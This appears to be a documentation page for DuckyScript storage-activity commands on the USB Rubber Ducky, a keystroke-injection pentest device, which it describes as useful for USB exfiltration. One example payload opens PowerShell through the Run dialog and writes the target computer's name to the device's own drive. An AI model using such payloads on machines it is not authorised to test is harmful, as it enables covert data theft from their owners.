Storage Activity

Overview

Storage activity is an experimental feature which may be used to detect whether or not the storage device, when using ATTACKMODE STORAGE is in use. This can be helpful when performing USB exfiltration. It can also be used to determine whether the storage device has been activated, useful for VID and PID enumeration.

Results may vary greatly depending on target OS. Some operating systems may keep storage active for an exceptionally long time.

WAIT_FOR_STORAGE_ACTIVITY

The WAIT_FOR_STORAGE_ACTIVITY command blocks all further payload execution until activity on the USB Rubber Ducky storage has been detected.

Example

REM Example WAIT_FOR_STORAGE_ACTIVITY Payload

ATTACKMODE HID STORAGE
DELAY 2000
LED_OFF
STRINGLN Waiting for the disk to be read from or written to...
$_STORAGE_ACTIVITY_TIMEOUT = 10000
WAIT_FOR_STORAGE_ACTIVITY
LED_OFF
LED_R

Result

The LED will light red after storage activity has been detected.

WAIT_FOR_STORAGE_INACTIVITY

The WAIT_FOR_STORAGE_INACTIVITY command blocks all further payload execution until the storage device is determined to be inactive.

Example

REM Example WAIT_FOR_STORAGE_INACTIVITY Payload

ATTACKMODE HID STORAGE
DELAY 2000
LED_OFF

GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRINGLN echo $env:computername >> $m:\computer_names.txt" 

$_STORAGE_ACTIVITY_TIMEOUT = 10000
WAIT_FOR_STORAGE_INACTIVITY
LED_OFF
LED_R

Result

The LED will light red when the storage device becomes inactive.

Internal Variables

The following internal variables relate to storage activity and may be used in your payload for advanced functions.

$_STORAGE_ACTIVITY_TIMEOUT

As payload is running, this value decrements if storage activity is not detected.

Default value is 1000.

Last updated 2 years ago